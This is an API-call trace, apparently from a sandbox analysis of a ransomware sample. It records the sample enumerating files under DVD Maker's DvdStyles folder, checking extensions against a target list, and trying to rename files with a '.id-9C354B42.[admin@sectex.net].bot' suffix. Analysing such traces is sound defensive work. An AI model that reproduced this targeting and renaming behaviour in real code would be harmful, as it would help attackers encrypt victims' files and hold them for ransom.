	[0138.899] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\1047x576black.png") returned 70
	[0138.899] lstrlenW (lpString=".jpg") returned 4
	[0138.899] lstrcmpiW (lpString1=".jpg", lpString2=".png") returned -1
	[0138.899] lstrcmpiW (lpString1=".png", lpString2=".bot") returned 1
	[0138.899] lstrlenW (lpString="15x15dot.png") returned 12
	[0138.899] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\15x15dot.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\huecycle\\15x15dot.png"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388
	[0138.992] GetFileSizeEx (in: hFile=0x388, lpFileSize=0xa54ff1c | out: lpFileSize=0xa54ff1c*=2821) returned 1
	[0138.993] CloseHandle (hObject=0x388) returned 1
	[0138.999] GetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\15x15dot.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\huecycle\\15x15dot.png")) returned 0x20
	[0139.000] GetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\15x15dot.png.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\huecycle\\15x15dot.png.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0139.017] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\15x15dot.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\huecycle\\15x15dot.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff
	[0139.024] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\15x15dot.png") returned 65
	[0139.024] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\15x15dot.png") returned 65
	[0139.024] lstrlenW (lpString=".doc") returned 4
	[0139.024] lstrcmpiW (lpString1=".doc", lpString2=".png") returned -1
	[0139.024] lstrlenW (lpString=".docx") returned 5
	[0139.024] lstrcmpiW (lpString1=".docx", lpString2="t.png") returned -1
	[0139.024] lstrlenW (lpString=".pdf") returned 4
	[0139.024] lstrcmpiW (lpString1=".pdf", lpString2=".png") returned -1
	[0139.024] lstrlenW (lpString=".xls") returned 4
	[0139.024] lstrcmpiW (lpString1=".xls", lpString2=".png") returned 1
	[0139.024] lstrlenW (lpString=".xlsx") returned 5
	[0139.024] lstrcmpiW (lpString1=".xlsx", lpString2="t.png") returned -1
	[0139.024] lstrlenW (lpString=".ppt") returned 4
	[0139.024] lstrcmpiW (lpString1=".ppt", lpString2=".png") returned 1
	[0139.024] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\15x15dot.png") returned 65
	[0139.024] lstrlenW (lpString=".zip") returned 4
	[0139.024] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1
	[0139.024] lstrlenW (lpString=".rar") returned 4
	[0139.024] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1
	[0139.024] lstrlenW (lpString=".bz2") returned 4
	[0139.024] lstrcmpiW (lpString1=".bz2", lpString2=".png") returned -1
	[0139.024] lstrlenW (lpString=".7z") returned 3
	[0139.024] lstrcmpiW (lpString1=".7z", lpString2="png") returned -1
	[0139.024] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\15x15dot.png") returned 65
	[0139.024] lstrlenW (lpString=".dbf") returned 4
	[0139.024] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1
	[0139.024] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\15x15dot.png") returned 65
	[0139.024] lstrlenW (lpString=".1cd") returned 4
	[0139.024] lstrcmpiW (lpString1=".1cd", lpString2=".png") returned -1
	[0139.024] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\15x15dot.png") returned 65
	[0139.025] lstrlenW (lpString=".jpg") returned 4
	[0139.025] lstrcmpiW (lpString1=".jpg", lpString2=".png") returned -1
	[0139.025] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\15x15dot.png") returned 65
	[0139.025] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\15x15dot.png") returned 65
	[0139.025] lstrlenW (lpString=".doc") returned 4
	[0139.025] lstrcmpiW (lpString1=".doc", lpString2=".png") returned -1
	[0139.025] lstrlenW (lpString=".docx") returned 5
	[0139.025] lstrcmpiW (lpString1=".docx", lpString2="t.png") returned -1
	[0139.025] lstrlenW (lpString=".pdf") returned 4
	[0139.025] lstrcmpiW (lpString1=".pdf", lpString2=".png") returned -1
	[0139.025] lstrlenW (lpString=".xls") returned 4
	[0139.025] lstrcmpiW (lpString1=".xls", lpString2=".png") returned 1
	[0139.025] lstrlenW (lpString=".xlsx") returned 5
	[0139.025] lstrcmpiW (lpString1=".xlsx", lpString2="t.png") returned -1
	[0139.025] lstrlenW (lpString=".ppt") returned 4
	[0139.025] lstrcmpiW (lpString1=".ppt", lpString2=".png") returned 1
	[0139.025] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\15x15dot.png") returned 65
	[0139.025] lstrlenW (lpString=".zip") returned 4
	[0139.025] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1
	[0139.025] lstrlenW (lpString=".rar") returned 4
	[0139.025] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1
	[0139.025] lstrlenW (lpString=".bz2") returned 4
	[0139.025] lstrcmpiW (lpString1=".bz2", lpString2=".png") returned -1
	[0139.025] lstrlenW (lpString=".7z") returned 3
	[0139.025] lstrcmpiW (lpString1=".7z", lpString2="png") returned -1
	[0139.025] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\15x15dot.png") returned 65
	[0139.025] lstrlenW (lpString=".dbf") returned 4
	[0139.025] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1
	[0139.025] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\15x15dot.png") returned 65
	[0139.025] lstrlenW (lpString=".1cd") returned 4
	[0139.025] lstrcmpiW (lpString1=".1cd", lpString2=".png") returned -1
	[0139.025] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\15x15dot.png") returned 65
	[0139.026] lstrlenW (lpString=".jpg") returned 4
	[0139.026] lstrcmpiW (lpString1=".jpg", lpString2=".png") returned -1
	[0139.026] lstrcmpiW (lpString1=".png", lpString2=".bot") returned 1
	[0139.026] lstrlenW (lpString="TitleButtonSubpicture.png") returned 25
	[0139.026] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\TitleButtonSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\performance\\titlebuttonsubpicture.png"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384
	[0139.095] GetFileSizeEx (in: hFile=0x384, lpFileSize=0xa54ff1c | out: lpFileSize=0xa54ff1c*=132) returned 1
	[0139.095] CloseHandle (hObject=0x384) returned 1
	[0139.095] GetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\TitleButtonSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\performance\\titlebuttonsubpicture.png")) returned 0x20
	[0139.096] GetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\TitleButtonSubpicture.png.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\performance\\titlebuttonsubpicture.png.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0139.096] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\TitleButtonSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\performance\\titlebuttonsubpicture.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff
	[0139.096] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\TitleButtonSubpicture.png") returned 81
	[0139.096] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\TitleButtonSubpicture.png") returned 81
	[0139.096] lstrlenW (lpString=".doc") returned 4
	[0139.096] lstrcmpiW (lpString1=".doc", lpString2=".png") returned -1
	[0139.096] lstrlenW (lpString=".docx") returned 5
	[0139.096] lstrcmpiW (lpString1=".docx", lpString2="e.png") returned -1
	[0139.096] lstrlenW (lpString=".pdf") returned 4
	[0139.096] lstrcmpiW (lpString1=".pdf", lpString2=".png") returned -1
	[0139.096] lstrlenW (lpString=".xls") returned 4
	[0139.096] lstrcmpiW (lpString1=".xls", lpString2=".png") returned 1
	[0139.096] lstrlenW (lpString=".xlsx") returned 5
	[0139.096] lstrcmpiW (lpString1=".xlsx", lpString2="e.png") returned -1
	[0139.096] lstrlenW (lpString=".ppt") returned 4
	[0139.096] lstrcmpiW (lpString1=".ppt", lpString2=".png") returned 1
	[0139.096] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\TitleButtonSubpicture.png") returned 81
	[0139.096] lstrlenW (lpString=".zip") returned 4
	[0139.096] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1
	[0139.096] lstrlenW (lpString=".rar") returned 4
	[0139.096] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1
	[0139.096] lstrlenW (lpString=".bz2") returned 4
	[0139.096] lstrcmpiW (lpString1=".bz2", lpString2=".png") returned -1
	[0139.096] lstrlenW (lpString=".7z") returned 3
	[0139.096] lstrcmpiW (lpString1=".7z", lpString2="png") returned -1
	[0139.097] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\TitleButtonSubpicture.png") returned 81
	[0139.097] lstrlenW (lpString=".dbf") returned 4
	[0139.097] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1
	[0139.097] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\TitleButtonSubpicture.png") returned 81
	[0139.097] lstrlenW (lpString=".1cd") returned 4
	[0139.097] lstrcmpiW (lpString1=".1cd", lpString2=".png") returned -1
	[0139.097] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\TitleButtonSubpicture.png") returned 81
	[0139.097] lstrlenW (lpString=".jpg") returned 4
	[0139.097] lstrcmpiW (lpString1=".jpg", lpString2=".png") returned -1
	[0139.097] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\TitleButtonSubpicture.png") returned 81
	[0139.097] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\TitleButtonSubpicture.png") returned 81
	[0139.097] lstrlenW (lpString=".doc") returned 4
	[0139.097] lstrcmpiW (lpString1=".doc", lpString2=".png") returned -1
	[0139.097] lstrlenW (lpString=".docx") returned 5
	[0139.097] lstrcmpiW (lpString1=".docx", lpString2="e.png") returned -1
	[0139.097] lstrlenW (lpString=".pdf") returned 4
	[0139.097] lstrcmpiW (lpString1=".pdf", lpString2=".png") returned -1
	[0139.097] lstrlenW (lpString=".xls") returned 4
	[0139.097] lstrcmpiW (lpString1=".xls", lpString2=".png") returned 1
	[0139.097] lstrlenW (lpString=".xlsx") returned 5
	[0139.097] lstrcmpiW (lpString1=".xlsx", lpString2="e.png") returned -1
	[0139.097] lstrlenW (lpString=".ppt") returned 4
	[0139.097] lstrcmpiW (lpString1=".ppt", lpString2=".png") returned 1
	[0139.097] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\TitleButtonSubpicture.png") returned 81
	[0139.097] lstrlenW (lpString=".zip") returned 4
	[0139.098] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1
	[0139.098] lstrlenW (lpString=".rar") returned 4
	[0139.098] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1
	[0139.098] lstrlenW (lpString=".bz2") returned 4
	[0139.098] lstrcmpiW (lpString1=".bz2", lpString2=".png") returned -1
	[0139.098] lstrlenW (lpString=".7z") returned 3
	[0139.098] lstrcmpiW (lpString1=".7z", lpString2="png") returned -1
	[0139.098] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\TitleButtonSubpicture.png") returned 81
	[0139.098] lstrlenW (lpString=".dbf") returned 4
	[0139.098] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1
	[0139.098] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\TitleButtonSubpicture.png") returned 81
	[0139.098] lstrlenW (lpString=".1cd") returned 4
	[0139.098] lstrcmpiW (lpString1=".1cd", lpString2=".png") returned -1
	[0139.098] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\TitleButtonSubpicture.png") returned 81
	[0139.098] lstrlenW (lpString=".jpg") returned 4
	[0139.098] lstrcmpiW (lpString1=".jpg", lpString2=".png") returned -1
	[0139.098] lstrcmpiW (lpString1=".wmv", lpString2=".bot") returned 1
	[0139.098] lstrlenW (lpString="Title_Page_PAL.wmv") returned 18
	[0139.098] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Title_Page_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\performance\\title_page_pal.wmv"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384
	[0139.099] GetFileSizeEx (in: hFile=0x384, lpFileSize=0xa54ff1c | out: lpFileSize=0xa54ff1c*=1901316) returned 1
	[0139.099] CloseHandle (hObject=0x384) returned 1
	[0139.099] GetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Title_Page_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\performance\\title_page_pal.wmv")) returned 0x20
	[0139.099] GetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Title_Page_PAL.wmv.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\performance\\title_page_pal.wmv.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0139.099] MoveFileW (lpExistingFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Title_Page_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\performance\\title_page_pal.wmv"), lpNewFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Title_Page_PAL.wmv.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\performance\\title_page_pal.wmv.id-9c354b42.[admin@sectex.net].bot")) returned 0
	[0139.099] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Title_Page_PAL.wmv") returned 74
	[0139.099] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Title_Page_PAL.wmv") returned 74
	[0139.099] lstrlenW (lpString=".doc") returned 4
	[0139.099] lstrcmpiW (lpString1=".doc", lpString2=".wmv") returned -1
	[0139.099] lstrlenW (lpString=".docx") returned 5
	[0139.099] lstrcmpiW (lpString1=".docx", lpString2="L.wmv") returned -1
	[0139.099] lstrlenW (lpString=".pdf") returned 4
	[0139.099] lstrcmpiW (lpString1=".pdf", lpString2=".wmv") returned -1
	[0139.099] lstrlenW (lpString=".xls") returned 4
	[0139.099] lstrcmpiW (lpString1=".xls", lpString2=".wmv") returned 1
	[0139.099] lstrlenW (lpString=".xlsx") returned 5
	[0139.099] lstrcmpiW (lpString1=".xlsx", lpString2="L.wmv") returned -1
	[0139.099] lstrlenW (lpString=".ppt") returned 4
	[0139.099] lstrcmpiW (lpString1=".ppt", lpString2=".wmv") returned -1
	[0139.099] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Title_Page_PAL.wmv") returned 74
	[0139.099] lstrlenW (lpString=".zip") returned 4
	[0139.099] lstrcmpiW (lpString1=".zip", lpString2=".wmv") returned 1
	[0139.099] lstrlenW (lpString=".rar") returned 4
	[0139.099] lstrcmpiW (lpString1=".rar", lpString2=".wmv") returned -1
	[0139.099] lstrlenW (lpString=".bz2") returned 4
	[0139.100] lstrcmpiW (lpString1=".bz2", lpString2=".wmv") returned -1
	[0139.100] lstrlenW (lpString=".7z") returned 3
	[0139.100] lstrcmpiW (lpString1=".7z", lpString2="wmv") returned -1
	[0139.100] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Title_Page_PAL.wmv") returned 74
	[0139.100] lstrlenW (lpString=".dbf") returned 4
	[0139.100] lstrcmpiW (lpString1=".dbf", lpString2=".wmv") returned -1
	[0139.100] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Title_Page_PAL.wmv") returned 74
	[0139.100] lstrlenW (lpString=".1cd") returned 4
	[0139.100] lstrcmpiW (lpString1=".1cd", lpString2=".wmv") returned -1
	[0139.100] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Title_Page_PAL.wmv") returned 74
	[0139.100] lstrlenW (lpString=".jpg") returned 4
	[0139.100] lstrcmpiW (lpString1=".jpg", lpString2=".wmv") returned -1
	[0139.100] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Title_Page_PAL.wmv") returned 74
	[0139.100] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Title_Page_PAL.wmv") returned 74
	[0139.100] lstrlenW (lpString=".doc") returned 4
	[0139.100] lstrcmpiW (lpString1=".doc", lpString2=".wmv") returned -1
	[0139.100] lstrlenW (lpString=".docx") returned 5
	[0139.100] lstrcmpiW (lpString1=".docx", lpString2="L.wmv") returned -1
	[0139.100] lstrlenW (lpString=".pdf") returned 4
	[0139.100] lstrcmpiW (lpString1=".pdf", lpString2=".wmv") returned -1
	[0139.100] lstrlenW (lpString=".xls") returned 4
	[0139.100] lstrcmpiW (lpString1=".xls", lpString2=".wmv") returned 1
	[0139.100] lstrlenW (lpString=".xlsx") returned 5
	[0139.100] lstrcmpiW (lpString1=".xlsx", lpString2="L.wmv") returned -1
	[0139.100] lstrlenW (lpString=".ppt") returned 4
	[0139.100] lstrcmpiW (lpString1=".ppt", lpString2=".wmv") returned -1
	[0139.100] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Title_Page_PAL.wmv") returned 74
	[0139.100] lstrlenW (lpString=".zip") returned 4
	[0139.100] lstrcmpiW (lpString1=".zip", lpString2=".wmv") returned 1
	[0139.100] lstrlenW (lpString=".rar") returned 4
	[0139.100] lstrcmpiW (lpString1=".rar", lpString2=".wmv") returned -1
	[0139.100] lstrlenW (lpString=".bz2") returned 4
	[0139.100] lstrcmpiW (lpString1=".bz2", lpString2=".wmv") returned -1
	[0139.100] lstrlenW (lpString=".7z") returned 3
	[0139.100] lstrcmpiW (lpString1=".7z", lpString2="wmv") returned -1
	[0139.101] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Title_Page_PAL.wmv") returned 74
	[0139.101] lstrlenW (lpString=".dbf") returned 4
	[0139.101] lstrcmpiW (lpString1=".dbf", lpString2=".wmv") returned -1
	[0139.101] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Title_Page_PAL.wmv") returned 74
	[0139.101] lstrlenW (lpString=".1cd") returned 4
	[0139.101] lstrcmpiW (lpString1=".1cd", lpString2=".wmv") returned -1
	[0139.101] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Title_Page_PAL.wmv") returned 74
	[0139.101] lstrlenW (lpString=".jpg") returned 4
	[0139.101] lstrcmpiW (lpString1=".jpg", lpString2=".wmv") returned -1
	[0139.101] lstrcmpiW (lpString1=".wmv", lpString2=".bot") returned 1
	[0139.101] lstrlenW (lpString="title_trans_notes.wmv") returned 21
	[0139.101] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\title_trans_notes.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\performance\\title_trans_notes.wmv"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384
	[0139.203] GetFileSizeEx (in: hFile=0x384, lpFileSize=0xa54ff1c | out: lpFileSize=0xa54ff1c*=709220) returned 1
	[0139.203] CloseHandle (hObject=0x384) returned 1
	[0139.203] GetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\title_trans_notes.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\performance\\title_trans_notes.wmv")) returned 0x20
	[0139.204] GetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\title_trans_notes.wmv.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\performance\\title_trans_notes.wmv.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0139.209] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\title_trans_notes.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\performance\\title_trans_notes.wmv"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff
	[0139.216] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\title_trans_notes.wmv") returned 77
	[0139.218] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\title_trans_notes.wmv") returned 77
	[0139.218] lstrlenW (lpString=".doc") returned 4
	[0139.224] lstrcmpiW (lpString1=".doc", lpString2=".wmv") returned -1
	[0139.224] lstrlenW (lpString=".docx") returned 5
	[0139.226] lstrcmpiW (lpString1=".docx", lpString2="s.wmv") returned -1
	[0139.226] lstrlenW (lpString=".pdf") returned 4
	[0139.231] lstrcmpiW (lpString1=".pdf", lpString2=".wmv") returned -1
	[0139.238] lstrlenW (lpString=".xls") returned 4
	[0139.240] lstrcmpiW (lpString1=".xls", lpString2=".wmv") returned 1
	[0139.242] lstrlenW (lpString=".xlsx") returned 5
	[0139.242] lstrcmpiW (lpString1=".xlsx", lpString2="s.wmv") returned -1
	[0139.244] lstrlenW (lpString=".ppt") returned 4
	[0139.246] lstrcmpiW (lpString1=".ppt", lpString2=".wmv") returned -1
	[0139.246] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\title_trans_notes.wmv") returned 77
	[0139.246] lstrlenW (lpString=".zip") returned 4
	[0139.246] lstrcmpiW (lpString1=".zip", lpString2=".wmv") returned 1
	[0139.246] lstrlenW (lpString=".rar") returned 4
	[0139.246] lstrcmpiW (lpString1=".rar", lpString2=".wmv") returned -1
	[0139.246] lstrlenW (lpString=".bz2") returned 4
	[0139.246] lstrcmpiW (lpString1=".bz2", lpString2=".wmv") returned -1
	[0139.246] lstrlenW (lpString=".7z") returned 3
	[0139.246] lstrcmpiW (lpString1=".7z", lpString2="wmv") returned -1
	[0139.246] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\title_trans_notes.wmv") returned 77
	[0139.246] lstrlenW (lpString=".dbf") returned 4
	[0139.246] lstrcmpiW (lpString1=".dbf", lpString2=".wmv") returned -1
	[0139.246] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\title_trans_notes.wmv") returned 77
	[0139.247] lstrlenW (lpString=".1cd") returned 4
	[0139.247] lstrcmpiW (lpString1=".1cd", lpString2=".wmv") returned -1
	[0139.247] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\title_trans_notes.wmv") returned 77
	[0139.247] lstrlenW (lpString=".jpg") returned 4
	[0139.247] lstrcmpiW (lpString1=".jpg", lpString2=".wmv") returned -1
	[0139.247] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\title_trans_notes.wmv") returned 77
	[0139.247] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\title_trans_notes.wmv") returned 77
	[0139.247] lstrlenW (lpString=".doc") returned 4
	[0139.247] lstrcmpiW (lpString1=".doc", lpString2=".wmv") returned -1
	[0139.247] lstrlenW (lpString=".docx") returned 5
	[0139.247] lstrcmpiW (lpString1=".docx", lpString2="s.wmv") returned -1
	[0139.247] lstrlenW (lpString=".pdf") returned 4
	[0139.247] lstrcmpiW (lpString1=".pdf", lpString2=".wmv") returned -1
	[0139.247] lstrlenW (lpString=".xls") returned 4
	[0139.247] lstrcmpiW (lpString1=".xls", lpString2=".wmv") returned 1
	[0139.247] lstrlenW (lpString=".xlsx") returned 5
	[0139.247] lstrcmpiW (lpString1=".xlsx", lpString2="s.wmv") returned -1
	[0139.247] lstrlenW (lpString=".ppt") returned 4
	[0139.247] lstrcmpiW (lpString1=".ppt", lpString2=".wmv") returned -1
	[0139.247] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\title_trans_notes.wmv") returned 77
	[0139.247] lstrlenW (lpString=".zip") returned 4
	[0139.247] lstrcmpiW (lpString1=".zip", lpString2=".wmv") returned 1
	[0139.247] lstrlenW (lpString=".rar") returned 4
	[0139.247] lstrcmpiW (lpString1=".rar", lpString2=".wmv") returned -1
	[0139.247] lstrlenW (lpString=".bz2") returned 4
	[0139.247] lstrcmpiW (lpString1=".bz2", lpString2=".wmv") returned -1
	[0139.247] lstrlenW (lpString=".7z") returned 3
	[0139.247] lstrcmpiW (lpString1=".7z", lpString2="wmv") returned -1
	[0139.247] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\title_trans_notes.wmv") returned 77
	[0139.247] lstrlenW (lpString=".dbf") returned 4
	[0139.247] lstrcmpiW (lpString1=".dbf", lpString2=".wmv") returned -1
	[0139.247] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\title_trans_notes.wmv") returned 77
	[0139.247] lstrlenW (lpString=".1cd") returned 4
	[0139.247] lstrcmpiW (lpString1=".1cd", lpString2=".wmv") returned -1
	[0139.248] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\title_trans_notes.wmv") returned 77
	[0139.248] lstrlenW (lpString=".jpg") returned 4
	[0139.248] lstrcmpiW (lpString1=".jpg", lpString2=".wmv") returned -1
	[0139.248] lstrcmpiW (lpString1=".wmv", lpString2=".bot") returned 1
	[0139.248] lstrlenW (lpString="Passport_PAL.wmv") returned 16
	[0139.248] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\Passport_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\travel\\passport_pal.wmv"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x390
	[0139.260] GetFileSizeEx (in: hFile=0x390, lpFileSize=0xa54ff1c | out: lpFileSize=0xa54ff1c*=109292) returned 1
	[0139.260] CloseHandle (hObject=0x390) returned 1
	[0139.260] GetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\Passport_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\travel\\passport_pal.wmv")) returned 0x20
	[0139.260] GetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\Passport_PAL.wmv.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\travel\\passport_pal.wmv.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
